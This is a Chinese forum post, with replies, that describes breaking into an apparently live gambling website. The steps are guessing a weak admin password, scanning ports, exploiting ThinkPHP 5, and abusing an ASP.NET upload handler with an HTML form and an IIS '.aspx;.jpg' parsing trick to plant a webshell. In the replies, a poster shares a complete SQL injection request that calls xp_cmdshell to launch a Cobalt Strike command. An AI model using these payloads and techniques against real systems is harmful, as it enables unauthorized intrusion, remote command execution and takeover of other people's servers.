某棋牌站点爆菊

群里小伙伴发出一张图片没有打码说这是在某司论坛看到一个标题(投稿文章:某棋牌室网站从信息搜集到CS上线)他想看一波文章。你看就看了发出没有打码图片干啥想让大家一起搞一波。结果他发了一张图(好久都没有搞渗透了。技巧确实没有了。。。。)

说是没权限并且是最高权限才可以看的。我c你说你发出来不就是让人看的设置一波255绝了。接下来模仿大佬搞一波棋牌站点
1
我去没有见过。来猜猜密码看看我去人品爆发啊弱口令进去了

大家不会以为这样就完了什么后台上传sql注入一把梭不存在的。找了半天没有找到。陷入沉思。我这如此之菜。后来看了看cookie发现6603admin这激起了我的兴趣。网上搜所一波结果是某狐棋牌网站。沃日
感觉百度一波看看有没有漏洞结果还真找到了
getshell的心里想沃日这么easy
结果一访问沃日。心中一万个曹尼玛涌过

综合某些资源发现了一个上传接口fuzz了一波发现永远都是0.我c可能是文件名称不对
4
于是乎什么网站备份扫描。目录扫描试了一波发现毛都没有。又陷入了沉思。
忽然眼前一亮我们不应该在一个地方死磕啊于是。操起端口扫描工具对其进行了一波探测。结果
终于找到了突破口找到一个端口竟然可以列目录。我去看到一个tp的一个目录然后点进去发现啥也没有显示于是看了一波日志发现日志最近是11.20号的看到了一个public于是拼接一下果然网站出来了

既然是tp5你们懂得拿去自己写的武器去探测一下看看
6
接下来直接拿shell就行了。拿shell过程如果有不会的直接百度一波看看。

接下来分析一下upload.ashx 拿出.net神器来分析一波

从这句代码来看

HttpPostedFile httpPostedFile = context.Request.Files["FileData"];

上传的名字应该是FileData。如果不对那么永远都是返回0从这段代码就可以看出

string s = "0";
	context.Response.Write(s);

所以应证了猜想参数不对从代码里面可以知道他要调用一个函数来验证上传参数的扩展名是否在这个函数中。一看函数凉凉了白名单验证

	public static readonly string[] allowExtend = new string[]
		{
			".jpg",
			".gif",
			".png",
			".bmp",
			".pdf",
			".xls",
			".xlsx",
			".doc",
			".docx",
			".rar",
			".txt"
		};

截断可以试试貌似截断只有在特定iis下才可以成功。另外通过读代码我们发现他的命名规则是

string str2 = DateTime.Now.ToString("yyyyMMddHHmm") + "_" + httpPostedFile.FileName;

时间_我们上次的文件名称
如果是2003的系统我们可以直接用解析漏洞来拿到shell

<html>
<body>

<form action="http://xxxx/ashx/Upload.ashx" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="FileData"/>


<br />
<input type="submit" value="Submit" />
</form>

</body>
</html>

下面演示一下
10
http://xxxx.com/images/JiangPin/202012181608_1.aspx;.jpg


在看别人搞得另外一套某狐网站登录处有注入但是这个棋牌系统在此登录处直接过滤单引号。并且做得是参数化因此登录处注入灭绝



另外发现那个上传点不是不存在了是被人改名字了

至此文章完结

1 Like

大佬,nb,这也能找到。

轮标点符号的重要性....

我小菜小菜 :rofl:

:cold_sweat::cold_sweat::cold_sweat::cold_sweat:

这套后台也有注入得,网狐得几乎都是机器人

没有找的那么仔细。这套是更新过得。找注入也是最后的道路。可以分享一波注入的点在哪里😅。有一个cookie爆路径的但是不准确。完了有时间深入研究看看

老哥能分享下么 注入点在哪里

老哥你知道了注入点在哪里嘛 我折腾好久找不到哈哈

已经找到了。如果在找不到。那我的技术就退步了。。。。也别叫擅长代码审计了。注入点代码我已经分享。空手套注入或者套day似乎不是很好。最起码得懂礼貌。礼貌都不懂又。想白嫖这种人我很看不起。这里不是针对你兄弟 :rofl:不要对号入座

GET /Module/FilledManager/LivcardAssociatorInfo.aspx?param=111'+;exec+master..xp_cmdshell+"cs上线命令"+-- HTTP/1.1
Host:www.xxx.com
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.xxx.com:8090/Left.aspx
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=snhurrdghnqtvqxjlzlywk3y; Default=RYCacheKey=1&RYCacheKey_ETS=2021-01-04+16%3a12%3a14&VS=65c8adf444b8eb27
Connection: close

:rofl: 害太难了 老弟不会审计 跟工具小子没区别了 哈哈 老哥能留下联系方式指点指点吗 拿到了个棋牌源码不会审计 :sweat_smile:

最近老哥属实是有点忙。你可以把你的代码地址发到我的邮箱上[email protected] 。或者是你的联系方式发到我的邮箱。加上不一定立马就能分析。只能说我不忙的时候可以分析一下。以后我打算搞个交流群。方便技术交流 :smiley:

哇交流群挺好的呀 现在别的论坛问个问题都不愿意回答了哈哈 90风气还是一如既往的好 老哥能来个交流群更加好了 主要想跟老哥请教下审计

为啥不愿意回答了。这年头白嫖的人太多了。第一:你回答了别人用你的方法搞站了。违法了可能把你供出来。第二:如果别人用你的方法搞站。获取利益了告诉你的人不会得到一分钱。仅会得到大佬你好牛逼。第三:人都是吃饭的没饭吃都活不下去。第四:大环境限制。所以有后来的小密圈了。但是你进了小密圈发现没几个是好的。基本都是为了利益。鸡毛学不下。。。想学习只能靠自己了。我就这么和你说 :rofl:

嗨 这个也是 都是要利益 没人平白无故得指点你

老哥QQ上联系你了 你要是有空的话看下

膜拜大佬

听说这种站维护不好会被爆头的。。

1 Like

注入店在哪里我小菜没有找到